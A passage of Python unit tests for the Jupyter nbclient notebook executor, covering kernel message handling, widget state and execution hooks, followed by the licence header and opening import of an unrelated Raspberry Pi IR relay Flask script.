copy.deepcopy(input_nb) for cell in cleaned_input_nb.cells: if 'execution_count' in cell: del cell['execution_count'] cell['outputs'] = [] executor = NotebookClient( cleaned_input_nb, resources=self.build_resources(), kernel_manager_class=FakeCustomKernelManager, ) # Override terminal size to standardise traceback format with modified_env({'COLUMNS': '80', 'LINES': '24'}): executor.execute() expected = FakeCustomKernelManager.expected_methods.items() for method, call_count in expected: self.assertNotEqual(call_count, 0, f'{method} was called') def test_process_message_wrapper(self): outputs: list = [] class WrappedPreProc(NotebookClient): def process_message(self, msg, cell, cell_index): result = super().process_message(msg, cell, cell_index) if result: outputs.append(result) return result current_dir = os.path.dirname(__file__) filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) original = copy.deepcopy(input_nb) wpp = WrappedPreProc(input_nb) executed = wpp.execute() assert outputs == [{'name': 'stdout', 'output_type': 'stream', 'text': 'Hello World\n'}] assert_notebooks_equal(original, executed) def test_execute_function(self): # Test the execute() convenience API filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) original = copy.deepcopy(input_nb) executed = execute(original, os.path.dirname(filename)) assert_notebooks_equal(original, executed) def test_widgets(self): """Runs a test notebook with widgets and checks the widget state is saved.""" input_file = os.path.join(current_dir, 'files', 'JupyterWidgets.ipynb') opts = dict(kernel_name="python") res = self.build_resources() res['metadata']['path'] = os.path.dirname(input_file) input_nb, output_nb = run_notebook(input_file, opts, res) output_data = [ output.get('data', {}) for cell in output_nb['cells'] for output in cell['outputs'] ] model_ids = [ data['application/vnd.jupyter.widget-view+json']['model_id'] for data in output_data if 'application/vnd.jupyter.widget-view+json' in data ] wdata = output_nb['metadata']['widgets']['application/vnd.jupyter.widget-state+json'] for k in model_ids: d = wdata['state'][k] assert 'model_name' in d assert 'model_module' in d assert 'state' in d assert 'version_major' in wdata assert 'version_minor' in wdata def test_execution_hook(self): filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) executor, hooks = get_executor_with_hooks(nb=input_nb) executor.execute() hooks["on_cell_start"].assert_called_once() hooks["on_cell_execute"].assert_called_once() hooks["on_cell_complete"].assert_called_once() hooks["on_cell_executed"].assert_called_once() hooks["on_cell_error"].assert_not_called() hooks["on_notebook_start"].assert_called_once() hooks["on_notebook_complete"].assert_called_once() hooks["on_notebook_error"].assert_not_called() def test_error_execution_hook_error(self): filename = os.path.join(current_dir, 'files', 'Error.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) executor, hooks = get_executor_with_hooks(nb=input_nb) with pytest.raises(CellExecutionError): executor.execute() hooks["on_cell_start"].assert_called_once() hooks["on_cell_execute"].assert_called_once() hooks["on_cell_complete"].assert_called_once() hooks["on_cell_executed"].assert_called_once() hooks["on_cell_error"].assert_called_once() hooks["on_notebook_start"].assert_called_once() hooks["on_notebook_complete"].assert_called_once() hooks["on_notebook_error"].assert_not_called() def test_error_notebook_hook(self): filename = os.path.join(current_dir, 'files', 'Autokill.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) executor, hooks = get_executor_with_hooks(nb=input_nb) with pytest.raises(RuntimeError): executor.execute() hooks["on_cell_start"].assert_called_once() hooks["on_cell_execute"].assert_called_once() hooks["on_cell_complete"].assert_called_once() hooks["on_cell_executed"].assert_not_called() hooks["on_cell_error"].assert_not_called() hooks["on_notebook_start"].assert_called_once() hooks["on_notebook_complete"].assert_called_once() hooks["on_notebook_error"].assert_called_once() def test_async_execution_hook(self): filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) executor, hooks = get_executor_with_hooks(nb=input_nb) executor.execute() hooks["on_cell_start"].assert_called_once() hooks["on_cell_execute"].assert_called_once() hooks["on_cell_complete"].assert_called_once() hooks["on_cell_executed"].assert_called_once() hooks["on_cell_error"].assert_not_called() hooks["on_notebook_start"].assert_called_once() hooks["on_notebook_complete"].assert_called_once() hooks["on_notebook_error"].assert_not_called() def test_error_async_execution_hook(self): filename = os.path.join(current_dir, 'files', 'Error.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) executor, hooks = get_executor_with_hooks(nb=input_nb) with pytest.raises(CellExecutionError): executor.execute() hooks["on_cell_start"].assert_called_once() hooks["on_cell_execute"].assert_called_once() hooks["on_cell_complete"].assert_called_once() hooks["on_cell_executed"].assert_called_once() hooks["on_cell_error"].assert_called_once() hooks["on_notebook_start"].assert_called_once() hooks["on_notebook_complete"].assert_called_once() hooks["on_notebook_error"].assert_not_called() class TestRunCell(NBClientTestsBase): """Contains test functions for NotebookClient.execute_cell""" @prepare_cell_mocks() def test_idle_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # Just the exit message should be fetched assert message_mock.call_count == 1 # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'stream', 'header': {'msg_type': 'execute_reply'}, 'parent_header': {'msg_id': 'wrong_parent'}, 'content': {'name': 'stdout', 'text': 'foo'}, } ) def test_message_for_wrong_parent(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An ignored stream followed by an idle assert message_mock.call_count == 2 # Ensure no output was written assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'status', 'header': {'msg_type': 'status'}, 'content': {'execution_state': 'busy'}, } ) def test_busy_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # One busy message, followed by an idle assert message_mock.call_count == 2 # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'stream', 'header': {'msg_type': 'stream'}, 'content': {'name': 'stdout', 'text': 'foo'}, }, { 'msg_type': 'stream', 'header': {'msg_type': 'stream'}, 'content': {'name': 'stderr', 'text': 'bar'}, }, ) def test_deadline_exec_reply(self, executor, cell_mock, message_mock): # exec_reply is never received, so we expect to hit the timeout. async def get_msg(timeout): await asyncio.sleep(timeout) raise Empty executor.kc.shell_channel.get_msg = get_msg executor.timeout = 1 with pytest.raises(TimeoutError): executor.execute_cell(cell_mock, 0) assert message_mock.call_count == 3 # Ensure the output was captured self.assertListEqual( cell_mock.outputs, [ {'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}, {'output_type': 'stream', 'name': 'stderr', 'text': 'bar'}, ], ) @prepare_cell_mocks() def test_deadline_iopub(self, executor, cell_mock, message_mock): # The shell_channel will complete, so we expect only to hit the iopub timeout. message_mock.side_effect = Empty() executor.raise_on_iopub_timeout = True with pytest.raises(TimeoutError): executor.execute_cell(cell_mock, 0) @prepare_cell_mocks( { 'msg_type': 'stream', 'header': {'msg_type': 'stream'}, 'content': {'name': 'stdout', 'text': 'foo'}, }, { 'msg_type': 'stream', 'header': {'msg_type': 'stream'}, 'content': {'name': 'stderr', 'text': 'bar'}, }, ) def test_eventual_deadline_iopub(self, executor, cell_mock, message_mock): # Process a few messages before raising a timeout from iopub def message_seq(messages): yield from messages while True: yield Empty() message_mock.side_effect = message_seq(list(message_mock.side_effect)[:-1]) executor.kc.shell_channel.get_msg = Mock( return_value=make_async({'parent_header': {'msg_id': executor.parent_id}}) ) executor.raise_on_iopub_timeout = True with pytest.raises(TimeoutError): executor.execute_cell(cell_mock, 0) assert message_mock.call_count >= 3 # Ensure the output was captured self.assertListEqual( cell_mock.outputs, [ {'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}, {'output_type': 'stream', 'name': 'stderr', 'text': 'bar'}, ], ) @prepare_cell_mocks( {'msg_type': 'execute_input', 'header': {'msg_type': 'execute_input'}, 'content': {}} ) def test_execute_input_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # One ignored execute_input, followed by an idle assert message_mock.call_count == 2 # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'stream', 'header': {'msg_type': 'stream'}, 'content': {'name': 'stdout', 'text': 'foo'}, }, { 'msg_type': 'stream', 'header': {'msg_type': 'stream'}, 'content': {'name': 'stderr', 'text': 'bar'}, }, ) def test_stream_messages(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An stdout then stderr stream followed by an idle assert message_mock.call_count == 3 # Ensure the output was captured self.assertListEqual( cell_mock.outputs, [ {'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}, {'output_type': 'stream', 'name': 'stderr', 'text': 'bar'}, ], ) @prepare_cell_mocks( { 'msg_type': 'stream', 'header': {'msg_type': 'execute_reply'}, 'content': {'name': 'stdout', 'text': 'foo'}, }, {'msg_type': 'clear_output', 'header': {'msg_type': 'clear_output'}, 'content': {}}, ) def test_clear_output_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A stream, followed by a clear, and then an idle assert message_mock.call_count == 3 # Ensure the output was cleared assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'stream', 'header': {'msg_type': 'stream'}, 'content': {'name': 'stdout', 'text': 'foo'}, }, { 'msg_type': 'clear_output', 'header': {'msg_type': 'clear_output'}, 'content': {'wait': True}, }, ) def test_clear_output_wait_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A stream, followed by a clear, and then an idle assert message_mock.call_count == 3 # Should be true without another message to trigger the clear self.assertTrue(executor.clear_before_next_output) # Ensure the output wasn't cleared yet assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}] @prepare_cell_mocks( { 'msg_type': 'stream', 'header': {'msg_type': 'stream'}, 'content': {'name': 'stdout', 'text': 'foo'}, }, { 'msg_type': 'clear_output', 'header': {'msg_type': 'clear_output'}, 'content': {'wait': True}, }, { 'msg_type': 'stream', 'header': {'msg_type': 'stream'}, 'content': {'name': 'stderr', 'text': 'bar'}, }, ) def test_clear_output_wait_then_message_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An stdout stream, followed by a wait clear, an stderr stream, and then an idle assert message_mock.call_count == 4 # Should be false after the stderr message assert not executor.clear_before_next_output # Ensure the output wasn't cleared yet assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'}] @prepare_cell_mocks( { 'msg_type': 'stream', 'header': {'msg_type': 'stream'}, 'content': {'name': 'stdout', 'text': 'foo'}, }, { 'msg_type': 'clear_output', 'header': {'msg_type': 'clear_output'}, 'content': {'wait': True}, }, { 'msg_type': 'update_display_data', 'header': {'msg_type': 'update_display_data'}, 'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}}, }, ) def test_clear_output_wait_then_update_display_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An stdout stream, followed by a wait clear, an stderr stream, and then an idle assert message_mock.call_count == 4 # Should be false after the stderr message assert executor.clear_before_next_output # Ensure the output wasn't cleared yet because update_display doesn't add outputs assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}] @prepare_cell_mocks( { 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, 'content': {'execution_count': 42}, } ) def test_execution_count_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An execution count followed by an idle assert message_mock.call_count == 2 assert cell_mock.execution_count == 42 # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, 'content': {'execution_count': 42}, } ) def test_execution_count_message_ignored_on_override(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0, execution_count=21) # An execution count followed by an idle assert message_mock.call_count == 2 assert cell_mock.execution_count == 21 # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'stream', 'header': {'msg_type': 'stream'}, 'content': {'execution_count': 42, 'name': 'stdout', 'text': 'foo'}, } ) def test_execution_count_with_stream_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An execution count followed by an idle assert message_mock.call_count == 2 assert cell_mock.execution_count == 42 # Should also consume the message stream assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}] @prepare_cell_mocks( { 'msg_type': 'comm', 'header': {'msg_type': 'comm'}, 'content': {'comm_id': 'foobar', 'data': {'state': {'foo': 'bar'}}}, } ) def test_widget_comm_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A comm message without buffer info followed by an idle assert message_mock.call_count == 2 self.assertEqual(executor.widget_state, {'foobar': {'foo': 'bar'}}) # Buffers should still be empty assert not executor.widget_buffers # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'comm', 'header': {'msg_type': 'comm'}, 'buffers': [b'123'], 'content': { 'comm_id': 'foobar', 'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]}, }, } ) def test_widget_comm_buffer_message_single(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A comm message with buffer info followed by an idle assert message_mock.call_count == 2 assert executor.widget_state == {'foobar': {'foo': 'bar'}} assert executor.widget_buffers == { 'foobar': {('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']}} } # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'comm', 'header': {'msg_type': 'comm'}, 'buffers': [b'123'], 'content': { 'comm_id': 'foobar', 'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]}, }, }, { 'msg_type': 'comm', 'header': {'msg_type': 'comm'}, 'buffers': [b'123'], 'content': { 'comm_id': 'foobar', 'data': {'state': {'foo2': 'bar2'}, 'buffer_paths': [['path2']]}, }, }, ) def test_widget_comm_buffer_messages(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A comm message with buffer info followed by an idle assert message_mock.call_count == 3 assert executor.widget_state == {'foobar': {'foo': 'bar', 'foo2': 'bar2'}} assert executor.widget_buffers == { 'foobar': { ('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']}, ('path2',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path2']}, } } # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'comm', 'header': {'msg_type': 'comm'}, 'content': { 'comm_id': 'foobar', # No 'state' 'data': {'foo': 'bar'}, }, } ) def test_unknown_comm_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An unknown comm message followed by an idle assert message_mock.call_count == 2 # Widget states should be empty as the message has the wrong shape assert not executor.widget_state assert not executor.widget_buffers # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'execute_result', 'header': {'msg_type': 'execute_result'}, 'content': { 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, 'execution_count': 42, }, } ) def test_execute_result_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An execute followed by an idle assert message_mock.call_count == 2 assert cell_mock.execution_count == 42 # Should generate an associated message assert cell_mock.outputs == [ { 'output_type': 'execute_result', 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, 'execution_count': 42, } ] # No display id was provided assert not executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'execute_result', 'header': {'msg_type': 'execute_result'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, 'execution_count': 42, }, } ) def test_execute_result_with_display_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An execute followed by an idle assert message_mock.call_count == 2 assert cell_mock.execution_count == 42 # Should generate an associated message assert cell_mock.outputs == [ { 'output_type': 'execute_result', 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, 'execution_count': 42, } ] assert 'foobar' in executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}}, } ) def test_display_data_without_id_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A display followed by an idle assert message_mock.call_count == 2 # Should generate an associated message assert cell_mock.outputs == [ { 'output_type': 'display_data', 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, } ] # No display id was provided assert not executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, }, } ) def test_display_data_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A display followed by an idle assert message_mock.call_count == 2 # Should generate an associated message assert cell_mock.outputs == [ { 'output_type': 'display_data', 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, } ] assert 'foobar' in executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, }, }, { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar_other'}, 'metadata': {'metafoo_other': 'metabar_other'}, 'data': {'foo': 'bar_other'}, }, }, { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, }, ) def test_display_data_same_id_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A display followed by an idle assert message_mock.call_count == 4 # Original output should be manipulated and a copy of the second now assert cell_mock.outputs == [ { 'output_type': 'display_data', 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, { 'output_type': 'display_data', 'metadata': {'metafoo_other': 'metabar_other'}, 'data': {'foo': 'bar_other'}, }, { 'output_type': 'display_data', 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, ] assert 'foobar' in executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'update_display_data', 'header': {'msg_type': 'update_display_data'}, 'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}}, } ) def test_update_display_data_without_id_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An update followed by an idle assert message_mock.call_count == 2 # Display updates don't create any outputs assert cell_mock.outputs == [] # No display id was provided assert not executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, }, { 'msg_type': 'update_display_data', 'header': {'msg_type': 'update_display_data'}, 'content': { 'transient': {'display_id': 'foobar2'}, 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, }, ) def test_update_display_data_mismatch_id_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An update followed by an idle assert message_mock.call_count == 3 # Display updates don't create any outputs assert cell_mock.outputs == [ { 'output_type': 'display_data', 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, } ] assert 'foobar' in executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, }, }, { 'msg_type': 'update_display_data', 'header': {'msg_type': 'update_display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, }, ) def test_update_display_data_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A display followed by an update then an idle assert message_mock.call_count == 3 # Original output should be manipulated assert cell_mock.outputs == [ { 'output_type': 'display_data', 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, } ] assert 'foobar' in executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'error', 'header': {'msg_type': 'error'}, 'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}, } ) def test_error_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 2 # Should also consume the message stream assert cell_mock.outputs == [ {'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']} ] @prepare_cell_mocks( { 'msg_type': 'error', 'header': {'msg_type': 'error'}, 'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}, }, reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, }, ) def test_error_and_error_status_messages(self, executor, cell_mock, message_mock): with self.assertRaises(CellExecutionError): executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 2 # Cell outputs should still be copied assert cell_mock.outputs == [ {'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']} ] @prepare_cell_mocks( { 'msg_type': 'error', 'header': {'msg_type': 'error'}, 'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}, }, reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # OK 'content': {'status': 'ok'}, }, ) def test_error_message_only(self, executor, cell_mock, message_mock): # Should NOT raise executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 2 # Should also consume the message stream assert cell_mock.outputs == [ {'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']} ] @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, } ) def test_allow_errors(self, executor, cell_mock, message_mock): executor.allow_errors = True # Should NOT raise executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 1 # Should also consume the message stream assert cell_mock.outputs == [] @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error', 'ename': 'NotImplementedError'}, } ) def test_allow_error_names(self, executor, cell_mock, message_mock): executor.allow_error_names = ['NotImplementedError'] # Should NOT raise executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 1 # Should also consume the message stream assert cell_mock.outputs == [] @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, } ) def test_raises_exception_tag(self, executor, cell_mock, message_mock): cell_mock.metadata['tags'] = ['raises-exception'] # Should NOT raise executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 1 # Should also consume the message stream assert cell_mock.outputs == [] @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, } ) def test_non_code_cell(self, executor, cell_mock, message_mock): cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[]) # Should NOT raise nor execute any code executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 0 # Should also consume the message stream assert cell_mock.outputs == [] @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, } ) def test_no_source(self, executor, cell_mock, message_mock): cell_mock = NotebookNode( # Stripped source is empty source=' ', metadata={}, cell_type='code', outputs=[], ) # Should NOT raise nor execute any code executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 0 # Should also consume the message stream assert cell_mock.outputs == [] @prepare_cell_mocks() def test_cell_hooks(self, executor, cell_mock, message_mock): executor, hooks = get_executor_with_hooks(executor=executor) executor.execute_cell(cell_mock, 0) hooks["on_cell_start"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_execute"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_complete"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_executed"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_OK ) hooks["on_cell_error"].assert_not_called() hooks["on_notebook_start"].assert_not_called() hooks["on_notebook_complete"].assert_not_called() hooks["on_notebook_error"].assert_not_called() @prepare_cell_mocks( { 'msg_type': 'error', 'header': {'msg_type': 'error'}, 'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}, }, reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, }, ) def test_error_cell_hooks(self, executor, cell_mock, message_mock): executor, hooks = get_executor_with_hooks(executor=executor) with self.assertRaises(CellExecutionError): executor.execute_cell(cell_mock, 0) hooks["on_cell_start"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_execute"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_complete"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_executed"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_ERROR ) hooks["on_cell_error"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_ERROR ) hooks["on_notebook_start"].assert_not_called() hooks["on_notebook_complete"].assert_not_called() hooks["on_notebook_error"].assert_not_called() @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, } ) def test_non_code_cell_hooks(self, executor, cell_mock, message_mock): cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[]) executor, hooks = get_executor_with_hooks(executor=executor) executor.execute_cell(cell_mock, 0) hooks["on_cell_start"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_execute"].assert_not_called() hooks["on_cell_complete"].assert_not_called() hooks["on_cell_executed"].assert_not_called() hooks["on_cell_error"].assert_not_called() hooks["on_notebook_start"].assert_not_called() hooks["on_notebook_complete"].assert_not_called() hooks["on_notebook_error"].assert_not_called() @prepare_cell_mocks() def test_async_cell_hooks(self, executor, cell_mock, message_mock): executor, hooks = get_executor_with_hooks(executor=executor, async_hooks=True) executor.execute_cell(cell_mock, 0) hooks["on_cell_start"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_execute"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_complete"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_executed"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_OK ) hooks["on_cell_error"].assert_not_called() hooks["on_notebook_start"].assert_not_called() hooks["on_notebook_complete"].assert_not_called() hooks["on_notebook_error"].assert_not_called() @prepare_cell_mocks( { 'msg_type': 'error', 'header': {'msg_type': 'error'}, 'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}, }, reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, }, ) def test_error_async_cell_hooks(self, executor, cell_mock, message_mock): executor, hooks = get_executor_with_hooks(executor=executor, async_hooks=True) with self.assertRaises(CellExecutionError): executor.execute_cell(cell_mock, 0) hooks["on_cell_start"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_execute"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_complete"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_executed"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_ERROR ) hooks["on_cell_error"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_ERROR ) hooks["on_notebook_start"].assert_not_called() hooks["on_notebook_complete"].assert_not_called() hooks["on_notebook_error"].assert_not_called()
raspi_ir_relay.py
#!/usr/bin/python # Copyright (c) 2016, <name of copyright holder> # Author: Tygart, Adam <mozestygart@gmail.com> # # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the <organization> nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function from flask import Flask, url_for, 